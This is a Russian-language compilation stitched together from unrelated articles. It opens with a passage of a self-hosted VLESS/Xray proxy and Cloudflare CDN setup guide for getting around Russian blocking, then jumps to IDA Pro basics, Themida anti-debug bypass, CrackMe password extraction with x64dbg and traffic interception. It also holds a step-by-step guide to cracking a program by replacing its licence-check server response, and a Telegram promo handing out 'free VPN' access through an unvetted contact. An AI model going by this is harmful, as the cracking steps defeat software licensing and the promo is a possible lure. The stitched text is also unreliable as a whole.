Шаг 4: В разделе Panel Settings -Security Settings укажите старые(admin/admin) и придумайте новые логин и пароль, жмите Confirm.

Шаг 5: Войдите в панель ещё раз с новым логином и паролем.
Теперь панель будет всегда доступна по HTTPS адресу вида: https://111.111.111.111:54321/mysecreturl/ (где IP, Порт и Путь будут вашими собственными).
Сохраните где-нибудь URL доступа к панели, логин и пароль. Инструкция (3/6) - настройка Xray

Xray - прокси-сервер, которым управляет панель 3X-UI. Именно Xray поддерживает протокол VLESS с маскировкой.

Шаг 1: В панели перейдите в раздел "Xray Settings" и включите две опции:

- IPv4 Configs -> Use IPv4 for Google
- WARP Configs -> Route OpenAI (ChatGPT) througw WARP.
Затем в верху страницы сохранитесь (Save Settings) и перезагрузитесь (Restart Xray)

Шаг 2: Пустите весь российский трафик на сервере через WARP.
Для этого перейдите в раздел "Xray Settings"->"Routing Rules", найдите строку где написано "geosite:openai" и отредактируйте её, чтобы получилось: geosite:category-gov-ru,regexp:.*\.ru$,geosite:openai
Наконец, добавьте новое правило через кнопку Add Rule (IP: geoip:ru, Outbound tag: WARP) как на скриншоте.
Опять сохранитесь вверху страницы (Save Settings), затем перезагрузитесь (Restart Xray)

Правильно заполненная таблица "Routing Rules" - ваш пропуск в интернет, товарищ!

Шаг 3: Найдите сайт‑донор для маскировки.
Уже на 4-м шаге панель предложит вам маскироваться под сайт

yahoo.com

. В принципе он подходит. Но если у вас сервер в Европе — это даст задержки при открытии новых сайтов, поскольку сервера yahoo находятся в Америке.
Оптимальным будет найти сайт в подсети хостера (вот инструкция ), но может случиться так, что в подсети сайта не обнаружится (у меня такое было).
Поэтому есть более простой вариант: найти небольшой сайт из той‑же страны, где вы арендовали VPS, затем зайти на сервер по SSH и с сервера попинговать его. Если время отклика будет минимальное (например, 15мс) — он подходит.

Я арендовал сервер в Нидерландах, поэтому выбрал голландский новостной сайт

- попинговал его с VPS-сервера: вижу время отклика 6мс, он подходит

Шаг 4: Настройте VLESS
В разделе (Inbound) - (Add inbound) надо заполнить указанные на скриншоте поля.
Самое важное:
- Remark и Email - любые строки (не обязательно адрес эл.почты), ни на что не влияют.
- Listening IP - укажите ваш IP
- Port - строго 443, чтобы маскироваться под обычный https-сайт.
- Только после выбора Security: Realityпоявится возможность выбора Flow: xtls-rprx-vision
- uTLS - именно Chrome, чтобы маскироваться под самый популярный браузер
- Dest, Server Names - указать сайт-донор (хотя можно оставить

Yahoo | Mail, Wetter, Suche, Nachrichten, Finanzen, Sport & mehr

Aktuelle Nachrichten, E-Mail, kostenlose Aktienkurse, Live-Spielstände und -Videos sind nur der Anfang. Bei Yahoo gibt es täglich mehr zu entdecken.

yahoo.com

)
- Кнопка (Get new cert) генерирует ключи.
- (Create) завершает создание.

Шаг 5: Получите ключ VLESS

Осталось в разделе Inbounds нажать на (три точки) -> Export Links ...
... и система даст скопировать строку-ключ вида:
vless://e034d537-b028-41f0-9e53-5f0838ea8b3b@111.111.111.111:443?type=tcp&security=reality&pbk=D0Bfsax3Ble2KiqDrOu3_qMJw7qVKyrnWgpvDTVkb3M&fp=chrome&sni=nltimes.nl&sid=64edf3b5&spx=%2F&flow=xtls-rprx-vision#My%20VLESS-Reality
Сохраните её в удобном месте.Инструкция (4/6) - настройка клиента (на компьютерах и телефонах)

Здесь всего три шага:

1. Установить приложение
2. Вставить туда строку-ключ с сервера
3. Настроить прямое соединение с Рунетом

Приложений много, они есть практически под все платформы, и они проверены временем.
Windows:

• Hiddify-Next (Новые версии ) (Проверенная версия 0.11.1 )
• Nekoray
• V2rayN

Android:

• Hiddify-Next (Play Market ), (GitHub )
• V2rayNG
• Nekobox

iOS:

• Streisand
• Shadowrocket (платный)
• Foxray

macOS:

• Hiddify-Next
• FoxRay
• Streisand

Настройка Hiddify-Next

Лидером среди приложений является Hiddify‑Next от наших иранских коллег.
Основные его плюсы:

• Крайне простой и понятный интерфейс «одна кнопка», минимум настроек.
• Русский язык
• Доступен под все платформы кроме iOS (но разработчики скоро сделают и его)

Интерфейс настолько простой, что я решил не делать скриншотов.
После установки приложения надо сделать всего две вещи:

• В настройках установить Регион: RU
• Скопировать в буфер и вставить в приложение строку‑ключ vless через кнопку (+)

Всё! Можно нажимать на огромную круглую кнопку — и прокси заработает!
Особенности Hiddify-Next на Windows:
Приложение может работать в двух режимах:

• Системный прокси (по умолчанию)
• TUN-режим

Большинство приложений (в том числе браузеры) понимает первый режим. Но не все. Если какое‑то приложение на Windows не видит ваш прокси — переключитесь в TUN‑режим (в настройках Hiddify‑Next). Чтобы TUN‑режим заработал, Hiddify‑Next необходимо запустить в «режиме администратора» (программа сама вам об этом скажет).
Особенности Hiddify‑Next на Android:
На андроиде есть супер‑удобная опция «Раздельное проксирование» (в настройках Hiddify‑Next). На iOS такого нет.
Раздельное проксирование позволяет выбрать, какие приложения будут использовать прокси. Например, я могу выбрать опцию «Проксировать только выбранные приложения» и поставить галочки на: «Нельзяграм, Канву и Хром». После включения прокси, только эти три приложения будут использовать прокси, а остальные (банковские приложения, яндекс‑карты и все остальные) продолжат соединяться со своими серверами напрямую.
Если настроить раздельное проксирование для выбранных приложений — прокси на телефоне можно держать включённым постоянно.
Настройка Streisand (iOS)

Streisand — бесплатное приложение, но в декабре оно на несколько дней становилось платным. Если оно опять станет платным в будущем (~200р) — считаю что оно стоит своих денег.
Итак, всё те же два шага:

1. Скопировать в буфер и вставить в приложение строку-ключ vless через кнопку (+)
2. Настроить прямое соединение с Рунетом. Тут несколько шагов.

Сначала - скопировать эту длинную строку с настройками в буфер.
streisand://aW1wb3J0L3JvdXRlOi8vWW5Cc2FYTjBNRERWQVFJREJBVUdEaGdaR2xWeWRXeGxjMTFrYjIxaGFXNU5ZWFJqYUdWeVZHNWhiV1ZlWkc5dFlXbHVVM1J5WVhSbFozbFVkWFZwWktJSEU5VUlDUW9MREEwT0R4QVNXMjkxZEdKdmRXNWtWR0ZuWFdSdmJXRnBiazFoZEdOb1pYSldaRzl0WVdsdVVtbHdWMjVsZEhkdmNtdFdaR2x5WldOMFZtaDVZbkpwWktDaEVWaG5aVzlwY0RweWRWZDBZM0FzZFdSdzFCUVZDZ3dORGhZU1cyOTFkR0p2ZFc1a1ZHRm5YV1J2YldGcGJrMWhkR05vWlhLaEYxbGtiMjFoYVc0NmNuVlpVbFV0WkdseVpXTjBYRWxRU1daT2IyNU5ZWFJqYUY4UUpFUkROVGxETXpsRExVUXdSRVl0TkRsR015MDVRVEl3TFVFMlJUVkVSakkwUkRaRE9RQUlBQk1BR1FBbkFDd0FPd0JBQUVNQVRnQmFBR2dBYndCeUFIb0FnUUNJQUlrQWl3Q1VBSndBcFFDeEFMOEF3UURMQU5VQTRnQUFBQUFBQUFJQkFBQUFBQUFBQUJzQUFBQUFBQUFBQUFBQUFBQUFBQUVK

Затем — вставить её в приложение через «+» справа‑вверху.
Наконец, зайди в «Роутинг», и там (поставить галочку), (нажать на «включить») и вернуться назад (стрелка слева)

Эффект Streisand: ON
Можно подключаться! (при первом подключении телефон попросит пароль).
Я ограничил инструкцию двумя приложениями, но если вы захотите поэкспериментировать с другими - в конце статьи будут три ссылки где искать доп. информацию.
upd: у меня нет macOS чтобы проверить, но MacOS Hiddify Next на данный момент «не умеет» tun-режим (о tun я писал выше), но это умеет FoxRay.Инструкция (5/6) -- проверка прокси

Если вы всё сделали по инструкции — у вас на устройствах уже должен быть работающий прокси. Но выполняет ли он свою функцию? Не обманул ли продавец VPS? Сейчас проверим.

1. Убедитесь, что прокси включён.
2. В браузере зайдите на https://ipinfo.io/ . Вы видите IP вашего VPS? Значит прокси работает и и вы всё настроили верно.
3. Откройте браузер и зайдите на https://rutracker.org . Открывает? Значит блокировка отключена.
4. Откройте браузер в режиме инкогнито и зайдите на https://maps.google.com . Вы видите карту той страны где покупали VPS? Вероятно ip «чистый».
5. Ещё раз посмотрите на https://ipinfo.io/ . Справа в разделе country вы видите ту страну в которой находится VPS? Значит ip «чистый».
6. Зайдите на https://canva.com Вы видите нормальный сайт и вас не посылают за то что вы из РФ? Значит западную цензуру обошли.
7. Зайдите на https://google.com Нет ошибки 403 и поиск доступен? Значит гугл не забанил ранее ваш IP.

Если что‑то пошло не так:

• п2 и п3: скорее всего где‑то ошиблись в выполнении инструкции, перепроверьте.
• п4,5,6 — вероятно хостер предоставил вам «грязный» IP, который числится в базах как российский. Есть шанс, что в течение двух недель базы обновятся... либо не обновятся. Имеет смысл написать в техподдержку хостеру, описать ситуацию и попросить поменять IP. Большинство идут на сотрудничество.
• п7 — просите хостера поменять IP.

Запасной план:
Если какой‑либо западный сайт не пускает вас к себе через VPS, то в качестве костыля можно пустить трафик до этого сайта через WARP.
Для этого в панели 3x-ui->Xray Settings->Routing Rules нужно найти и отредактировать строку geosite:category-gov-ru,regexp:.*\.ru$,geosite:openai - дописать сайты через запятую, пример geosite:category-gov-ru,regexp:.*\.ru$,geosite:openai,intel.com,canva.com (обязательно сохраните изменения и перезагрузите Xray)
После этого западные сайты вместо IP вашего VPS будут видеть IP сети WARP, что почти наверняка позволит обойти их цензуру.
Да, покупка IP‑адреса — это всегда лотерея и есть небольшой шанс проблем, но чаще всего всё работает с первого раза.Инструкция (6/6) -- настройка CDN CloudFlare

Переходим к последнему, самому интересному разделу.
Любое управление рисками сводится к трём шагам:

• Определить риск (в данном случае, это риск, что рф-цензура заблокирует ваш сервер)
• Минимизировать риск (вы это уже сделали, воплотив знания из "Теории ч3")
• Определить План Б на тот редкий случай, если риск всё-же реализуется.

Хотя я не верю, что - с принятой предосторожностью - сервер вообще может быть когда-либо заблокирован, но обычно реальность не интересуется нашими верованиями.
Проксирование через CDN - это и есть "План Б". Сейчас вы настроите ещё одно, запасное соединение, которое будет работать, даже если ваш VPS станет недоступен изнутри РФ.
Шаг 1: Выберите продавца доменного имени и убедитесь что доменное имя свободно (см. Теория ч2), но НЕ ПОКУПАЙТЕ его пока. CloudFlare работает только с доменными именами второго уровня (есть исключения, но они нам не помогут). Доменное имя второго уровня — это имя с одной точкой, вроде mypersonalsite.com или myhabraproxy.ru.
Для этой инструкции я выбрал доменное имя habraproxy.store у продавца Dreamhost. Прямо сейчас dreamhost бесплатно раздаёт доменные имена.store на 1 год — но эта халява только для клиентов, которые в прошлом что‑то уже покупали.
Кстати, если у вас уже есть свой сайт с доменом...
Итак, продавец выбран, доменное имя выбрано но не куплено, идём дальше.
Шаг 2: Зарегистрируйтесь на

Connect, Protect and Build Everywhere | Cloudflare

(Sign Up — Тариф Free — Add Website — e‑mail+пароль). Сохраните пароль, подтвердите аккаунт по ссылке из письма.

Шаг 3: Зайдите в CloudFlare, в верхнем разделе "Websites" добавьте ещё не купленное доменное имя. Далее - Тариф Free - Continue... пока наконец вы не попадёте на страницу "Change your nameservers" с двумя оранжевыми облаками.
Эти две строки нам понадобятся. Ваши строки могут отличаться от моих.

Мы пойдём другим путём
Шаг 4: Теперь смело покупайте ваше доменное имя, а во время покупки укажите, что будете использовать name-сервера свои, а не те что предлагает продавец. Впишите эти две строки и завершите покупку.
На скриншоте - сайт моего продавца.
Итак, вы купили домен и указали нужные неймсервера. Активация свежекупленного домена займёт несколько минут, самое время донастроить CloudFlare.
Шаг 6: В разделе DNS создайте A‑запись для вашего домена и IP вашего сервера. У меня это выглядит вот так:

Шаг 7: В разделе Network включите "gRPC" (обойдусь без скриншота).

Шаг 8: В разделе Rules->Origin Rules создайте два правила:
(1) Все запросы на сервер направляйте на порт 54321 (укажите порт, на котором работает ваша панель 3xui)
(2) Все запросы по секретному адресу /my-gRPC-3049382 (придумайте что-то своё) направляйте на порт 2053
Последовательность этих двух правил важна.

Нажми на кнопку - получишь результат!
Шаг 9: Вернитесь на Overview, и если под оранжевыми облаками найдёте кнопку "Check nameservers now" - нажмите её, чтобы поторопить систему.
(если прошло много времени и там нет ни облаков, ни кнопки - вообще отлично, переходите к следующему шагу)

Шаг 9¾: Создайте второе VLESS-подключение для CDN.
Вернитесь в панель 3X-UI. Inbound -Add Inbound
Самое важное:
- Порт - тот же, что и во "втором правиле". 2053 или любой другой на ваш выбор (но смысла менять его на другой не вижу).
- Transmission - gRPC, именно такой тип соединения безлимитен на CloudFlare.
- Service name - секретная строка из "второго правила" my-gRPC-3049382, но строго без "/" в начале.
- uTLS - именно Chrome, чтобы маскироваться под самый популярный браузер
- ALPN сделайте пустым.
- Кнопка (Get Сert from Panel) вписывает ключи.
- Allow Insecure - включайте на время тестирования, когда начнёте пользоваться CDN - можно будет выключить.
Наконец, проверяйте что получилось. Экспортируйте строку-ключ этого нового соединения и скопируйте её в приложение - прокси должен работать. (пока это не CDN, вы лишь подключились к своему VPS через порт 2053 по протоколу VLESS-gRPC, но скоро вместо вас это будет делать CloudFlare)
Шаг 10: Финальная настройка CloudFlare.

Каково это, быть избранным?
Обновите раздел Overview.
CloudFlare должен вас обрадовать сообщением: "Great news! Cludflare is now protecting your site"
Если этого сообщения нет, а вместо него - страница, на которой остались два оранжевых облака - значит одно из двух:

• Нужно ещё немного подождать
• Вы что-то сделали не так.

Доквантовая криптография, скриншот начала 21 века
Если всё так, тогда: в разделе SSL/TLS включите режим Full
Теперь вы точно завершили настройку CloudFlare.
Шаг 11: Проверка.
Откройте браузер и перейдите по адресу https://habraproxy.store/mysecreturl/ (меняйте имя сайта на своё, и адрес страницы на свой - тот что установили для панели 3x-ui).
Откроется панель 3x-ui. Теперь управлять панелью вы будете с этого адреса!
Сохраните этот адрес где-нибудь.
Шаг 12: Ещё одна проверка.
Откройте браузер по адресу https://habraproxy.store и убедитесь, что там пустая страница 404.
Это значит любой цензор, зайдя на ваш сайт, убедится: там есть настоящий веб-сервер. В качестве веб-сервера выступает сама панель 3x-ui, которая отдаёт 404 ошибку на любой неизвестный ей адрес. Никакой внешний наблюдатель не узнает адрес панели (/secreturl/). А если цензор послушает трафик, то увидит зашифрованный поток gRPC, который используется для обслуживания веб-приложений по всему интернету.
Шаг 13: Настало время МАГИИ:
Отредактируйте строку-ключ второго подключения:

• Замените IP на доменное имя,
• Замените порт на :443,
• Удалите allowInsecure=1
• Отредактируйте имя (после #) по своему желанию

Было: vless://03684ba0-1994-4106-86da-e91fdd9007e0@111.111.111.111:2053?type=grpc&serviceName=my-gRPC-3049382&security=tls&fp=chrome&alpn=&allowInsecure=1#My%20CDN-tjo1gifl
Стало: vless://03684ba0-1994-4106-86da-e91fdd9007e0@habraproxy.store:443?type=grpc&serviceName=my-gRPC-3049382&security=tls&fp=chrome&alpn=&#My%20CDN
Наконец, копируйте эту строку в приложение, проверяйте работоспособность и наслаждайтесь запасным каналом для своего прокси.
Самое время процитировать @MiraclePtr :
Fair use
Понятное дело, что то, что CDN разрешают на своих бесплатных тарифах проксировать Websockets и gRPC — это такой жест доброй воли от них. Давайте не наглеть и использовать эти возможности только в совсем безвыходных случаях, которые, надеюсь, все‑таки не наступят.Недостатки этого решения

1. «Сложность» настройки:
Безусловно, купить VPN за 100 рублей в месяц намного проще, чем впервые в жизни настроить «вот это всё». Я не строю иллюзий, что «все домохозяйки в стране сделают прокси частью своего хозяйства». Это решение — для небольшого числа людей, которые очень ценят свободу информации, очень ценят надёжность и готовы инвестировать своё внимание во всякое «технарское колдунство».
2. Периодическая недоступность VPS:
Uptime бюджетного VPS — примерно 99.9% (бывает и выше, и ниже). Это значит, что примерно 42 минуты в месяц VPS может быть недоступен (иногда эти минуты растягиваются до часов и даже дней). То есть вы гарантированно однажды встретитесь с ситуацией, когда VPS временно не отвечает ни по IP, ни через CDN. Причин множество, я встречался как минимум с этими тремя: факап хостера, DDOS‑атака на хостера, проблемы в дата‑центре где физически находится VPS (на которые сам хостер повлиять не может).
Я решаю этот вопрос просто — у меня два сервера от разных хостерах в разных странах (основной и запасной), этого хватает.
Другое решение — на случай форс‑мажора иметь под рукой запасную строку‑ключ (shadowsocks, vless, trojan) от какого‑нибудь бесплатного сервиса, благо в телеграмме их полно. Конечно, передавать свой трафик через бесплатный сервис — это стрёмно , но если VPS недоступен, а доступ нужен срочно, то временное использование бесплатного сервиса может оказаться приемлемым, решайте сами.
3. Доверие китайским программистам:
Хотя и сервер, и клиенты — это opensource приложения (основанные на Xray и SingBox ), они не проходили независимый аудит, и теоретически там могут быть ошибки, а разработчики — тоже теоретически — могут добавить зловредный код в новые версии (впрочем, такое можно сказать про любое opensource‑решение, но это не мешает существованию опенсорса в мире). Один из вариантов управления этим риском — использовать проверенные версии клиентских и серверных приложений. Пользуясь компьютером и телефоном вы уже доверяете сотням людей и корпораций. Если эти opensource‑решения не вызывают у вас доверия — стоит поискать другие. Я же не вижу здесь никакой проблемы, лишь озвучиваю существующее мнение.
4. Отсутствие XTLS в CDN‑проксировании:
Да, моё решение использует XTLS только для соединения с сервером напрямую, и простой TLS для проксирования через CDN. Я не нашёл способа простой настройки XTLS через CDN, но всё же это возможно. В РФ пока не умеют детектировать шифрование уже зашифрованного трафика (tls‑in‑tls), но если научатся — это может быть потенциальной проблемой, хотя я оцениваю этот шанс как стремящийся к нулю.
5. Не анонимность:
Да, использование прокси заметно повышает уровень анонимности в интернете, но ни один прокси не гарантирует абсолютной анонимности. Данное решение не заточено на анонимность, а для свободного доступа к информации. Пожалуйста, не путайте доступ к информации и анонимность, это очень разные задачи.

1. Загрузка файла
При загрузке бинарного файла IDA Pro проводит анализ, включая:
- Автоопределение формата: IDA может определить тип файла (например, PE, ELF, Mach-O) и архитектуру (x86, x64, ARM и т. д.).
- Процесс инициализации: IDA выполняет начальный анализ кода, идентифицируя функции, строки и данные. Это может занять время, в зависимости от размера бинарника.

2. Основные интерфейсы и навигация
- Дизассемблер: Основное окно, отображающее дизассемблированный код. Код представлен в виде команд, каждая из которых имеет адрес и сопутствующую информацию.
- Код-граф: Позволяет визуально анализировать потоки управления в функциях. Можно перемещаться по графу, чтобы понять, как функции взаимосвязаны.
- Функции и дерево функций: Список всех функций, найденных в бинаре. Вы можете отсортировать их по имени, адресу и размеру.

3. Анализ и редактирование кода
- Переименование: Вероятно, самая полезная функция. Вы можете переименовать функции и переменные, чтобы сделать их более понятными. Используйте `N` для переименования.
- Аннотации и комментарии: Вы можете добавлять комментарии к строкам кода и функциям, нажимая `;`. Это помогает запомнить детали анализа.
- Переходы: Используйте `Enter` для перехода к определённым адресам, функциям или данным, что облегчает навигацию.

4. Исследование данных
- Строки: При нажатии на `Shift + F12`, вы можете увидеть все текстовые строки, содержащиеся в файле. Это может помочь в поиске значимых строк (например, URL, ключей и т. д.).
- Данные и структуры: IDA Pro позволяет исследовать структуры данных, используя `Ctrl + S` для создания пользовательских структур.

5. Плагины и скрипты
- Скрипты: IDA Pro поддерживает Python и IDC для написания скриптов. Это позволяет автоматизировать задачи, такие как анализ функции или манипуляция с данными.
- Плагины: Существует множество уже готовых плагинов, которые добавляют функции, такие как дополнительный анализ, экспортирование данных или улучшенные графические представления.

6. Инструменты анализа
- Типизация данных: IDA Pro поддерживает типизацию данных, что позволяет вам задавать типы для переменных и структур, что повышает читаемость анализа.
- Фантомные функции: Создание "фантомных" функций для упрощения навигации и анализа.

7. Экспорт и отчетность
- Сохранение работы: Работы можно сохранять в проект IDA, однако также можно экспортировать результаты анализа в XML, HTML или текстовые форматы.
- Отчёты: IDA может генерировать отчёты, содержащие полную информацию о функциях, графах и стримах.

8. Уголовный анализ и совместимость
- Группировка функций: Функции можно группировать по категориям, например, по типам операций (например, обработка строк, работа с файлами и т. д.).
- Совместимость с другими инструментами: IDA Pro может интегрироваться с другими инструментами для реверс-инжиниринга и анализа, такими как Ghidra, Radare2 и другими.

9. Дополнительные возможности
- IDAPython: Позволяет расширять функциональность IDA Pro с помощью Python. Вы можете создавать сложные скрипты для выполнения анализов и автоматизации.
- MDI интерфейс: Поддержка многодокументного интерфейса позволяет одновременно открывать несколько проектов или файлов.

10. Документация и ресурсы
- IDA Pro предоставляет встроенные справочные материалы и документацию, которая подробно объясняет все функции и возможности. Также доступны многочисленные учебные пособия и видео на YouTube и специализированных форумах.

Введение

Themida — это мощное программное обеспечение для защиты, которое использует множество методов анти-дебаггирования для предотвращения реверс-инжиниринга своих защищенных приложений. В этой статье рассмотрим некоторые подходы к обходу системы анти-дебаггера Themida.

1. **Инструменты**: Убедитесь, что у вас установлены необходимые инструменты, такие как отладчик (например, x64dbg), дизассемблер (например, IDA Pro) и инструменты для модификации исполняемых файлов.

2. **Цель**: Найдите защищенное приложение, желательно CrackMe, чтобы тренироваться в обходе защиты.

1. Запустите защищенное приложение в отладчике.

2. Обратите внимание на сообщения об ошибках, связанные с дебаггингом или обнаружением отладчиков. Themida может завершить процесс, если он запущен в отладчике.

1. Используйте инструменты, такие как ScyllaHide или TitanHide, чтобы скрыть факт дебаггирования. Эти инструменты могут скрыть ваш отладчик от Themida.

2. Вы также можете попробовать изменить код самостоятельно, отключив проверки на наличие отладчика, удалив или модифицируя соответствующие инструкции в коде.

1. Themida использует множество методов для проверки наличия отладчика, таких как проверки системных функций и проверка состояния регистров.

2. Запустите программу и найдите функции, ответственные за эти проверки. Как правило, они основаны на системных вызовах, таких как `IsDebuggerPresent` или `CheckRemoteDebuggerPresent`. Вы можете изменить поведения этих функций, подменив их на NOP-операции или новые функции.

1. Themida использует защиту на уровне кода, которая может включать обфускацию и динамическую подмену функций.

2. По мере изучения программы ищите участки кода, которые могут вызывать проверки. Это можно сделать с помощью дизассемблера, изучая потоки выполнения.

1. Иногда используют методы, такие как управление стеком, для обхода защит. Это может включать удаление или изменение значений с помощью отладчика.

2. Используйте возможности отладчика, чтобы изменить значения регистров или стека в процессе выполнения.

Введение

CrackMe — это небольшие программы, предназначенные для тренировки навыков реверс-инжиниринга. В данной статье мы рассмотрим, как использовать X64dbg для извлечения пароля из программы CrackMe. X64dbg — это мощный отладчик для Windows, который позволяет анализировать и модифицировать исполняемые файлы.

- X64dbg: бесплатный инструмент для реверс-инжиниринга, доступный для Windows.
- Программа CrackMe: убедитесь, что у вас есть исполняемый файл CrackMe, который вы хотите проанализировать.

1. Скачайте последнюю версию X64dbg с официального сайта.
2. Разархивируйте загруженный файл в удобное место.
3. Запустите x64dbg.exe (для 64-битной программы) или x32dbg.exe (для 32-битной).

1. В X64dbg выберите в меню File → Open и загрузите файл CrackMe.
2. После загрузки программы вы увидите интерфейс отладчика с отображением кода и регистров.

1. Запустите приложение, нажав F9 или выбрав Run из меню.
2. Найдите входную точку программы. Обычно это функция main.
3. Перейдите в область кода, где происходит проверка пароля. Обычно это условие, сравнивающее введенный пароль со строкой.

1. Когда вы дойдете до кода, в котором происходит проверка пароля, установите точку останова, дважды кликнув по инструкции.
2. Это позволит вам остановиться перед сравнением пароля.

1. Запустите программу снова (F9). Введите неправильный пароль, чтобы достичь точки останова.
2. Как только программа остановится, исследуйте регистры и стек.
3. Смотрите на указатели в регистрах, таких как RDI, RSI или RDX. Часто пароль хранится в строке или переменной.

1. Если пароль представлен в виде строки, скопируйте его с помощью контекстного меню.
2. Вы можете изменить значение регистра или памяти, чтобы обойти проверку пароля.

Введение

Обратная разработка (reverse engineering) — это мощный инструмент, позволяющий исследовать и анализировать программное обеспечение для понимания его внутренней структуры, принципов работы и функциональных особенностей. Одним из наиболее эффективных методов в этом процессе является подмена трафика. Этот подход позволяет производить анализ взаимодействия между клиентом и сервером, выявлять уязвимости и исследовать скрытые функции приложений. В данной статье мы подробно рассмотрим, как осуществить подмену трафика на примере анализа HTTPS трафика.

Для успешной подмены трафика вам понадобятся определенные инструменты. Рассмотрим наиболее популярные из них:

- **Fiddler**: Инструмент для перехвата и анализа HTTP(S) трафика, который поддерживает множество платформ и позволяет отлаживать веб-запросы.
- **Charles Proxy**: Мощный прокси-сервер, способный перехватывать HTTPS трафик, анализировать запросы и изменять их в реальном времени.
- **Burp Suite**: Профессиональный инструмент в области безопасности веб-приложений, который включает в себя функции перехвата трафика, модификации запросов и тестирования уязвимостей.

Установите выбранный инструмент и произведите необходимые настройки:

Настройка Fiddler или Charles
1. Запустите выбранный инструмент.
2. Настройте устройство (например, браузер или мобильное приложение) на использование прокси-сервера. Обычно это делается через параметры сети, указывая адрес `localhost` и порт, например, `8888`.
3. Для перехвата HTTPS-трафика необходимо импортировать корневой сертификат прокси на устройство:
- В Fiddler: выберите `Tools` → `Options` → `HTTPS` и установите галочку на `Decrypt HTTPS traffic`.
- В Charles: выберите `Help` → `SSL Proxying` → `Install Charles Root Certificate`.

Настройка Wireshark
Wireshark — это инструмент для глубокого анализа сетевого трафика, который позволяет видеть пакеты на более низком уровне. Просто запустите его и выберите интерфейс, с которого будете перехватывать данные.

Запустите программу, которую хотите проанализировать, и начните перехват трафика. Внимательно изучайте:

- **Методы запросов**: GET, POST, PUT и другие.
- **Параметры запросов**: данные, передаваемые через URL и тело запроса.
- **Заголовки**: ключевые поля, такие как `Authorization`, `User-Agent`, `Content-Type`, которые могут содержать полезную информацию.
- **Ответы**: изучите структуру получаемых данных, чтобы понять, как приложение обрабатывает запросы и какие данные возвращает.

С помощью вашего инструмента вы можете модифицировать запросы и подменять их в реальном времени:

1. **Изменение параметров запроса**: Подменяйте значения параметров, чтобы протестировать, как приложение реагирует на невалидные или измененные данные.
2. **Изменение заголовков**: Экспериментируйте с заголовками, меняя токены аутентификации или версии API, чтобы проверить, как это повлияет на ответ сервера.

Всем привет, сегодня я расскажу как крякнуть программу с подменой траффика.

Что нам нужно для этого?

HTTP DEBUGER / FIDDLER EVERYWHERE

1. Анализируем траффик

Введём неверный ключ и видим ссылку на сайт где происходит проверка

Перейдем по ссылке и увидим ответ

Теперь введём верный ключ

Снова перейдем по ссылке и увидим новый ответ(key_ok)

2. Работа с HTTP Debugger

Нажимаем на наш ключ и делаем автоматическую замену ответа

Далее:

Нажимаем кнопку "Save"

Поздравляю! Вы успешно крякнули программу!

Всем привет! Сегодня я вам расскажу как бесплатно получить VPN сервер для обхода блокировки Youtube и прочих сервисов!

1. Подписываемся на Telegram канал(t.me/metashop_win)

2. После подписки пишем администратору(@metasteall)

3. Получаем VPN сервер и инструкцию по установке!

4. Наслаждаемся высоко-скоростным VPN'ом!

Буду благодарен любому донату за предоставленный мною способ!

настройка VPN для мобильных устройств:

Настройка VPN на ПК Windows / MacOS: